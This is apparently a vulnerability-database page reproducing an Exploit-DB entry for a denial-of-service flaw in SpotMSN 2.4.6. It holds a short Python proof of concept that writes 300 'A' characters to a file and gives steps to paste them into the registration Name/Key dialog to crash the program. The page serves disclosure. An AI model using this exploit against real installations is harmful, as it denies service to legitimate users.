header-logo
Suggest Exploit
vendor:
SpotMSN
by:
Victor Mondragón
7.8
CVSS
HIGH
Denial of Service
400
CWE
Product Name: SpotMSN
Affected Version From: 2.4.6
Affected Version To: 2.4.6
Patch Exists: YES
Related CWE: N/A
CPE: a:nsauditor:spotmsn:2.4.6
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Windows Windows 10 Single Language x64 / 7 x64 Service Pack 1
2019

SpotMSN 2.4.6 – ‘Name/Key’ Denial of Service (PoC)

A denial of service vulnerability exists in SpotMSN 2.4.6 when a maliciously crafted Name/Key is entered into the registration code dialog, resulting in a crash. An attacker can leverage this vulnerability to crash the application, denying service to legitimate users.

Mitigation:

Upgrade to the latest version of SpotMSN.
Source

Exploit-DB raw data:

#Exploit Title: SpotMSN 2.4.6 - 'Name/Key' Denial of Service (PoC)
#Discovery by: Victor Mondragón
#Discovery Date: 2019-05-12
#Vendor Homepage: www.nsauditor.com 
#Software Link: http://www.nsauditor.com/downloads/spotmsn_setup.exe
#Tested Version: 2.4.6
#Tested on: Windows Windows 10 Single Language x64 / 7 x64 Service Pack 1

#Steps to produce the crash:
#1.- Run python code: SpotMSN_2.4.6.py
#2.- Open SpotMSN.txt and copy content to clipboard
#3.- Open SpotMSN
#4.- Select "Register" > "Enter Registration Code..."
#5.- In "Name/Key" paste Clipboard
#6.- Click "Ok"
#7.- Crarshed
 
cod = "\x41" * 300
 
f = open('SpotMSN.txt', 'w')
f.write(cod)
f.close()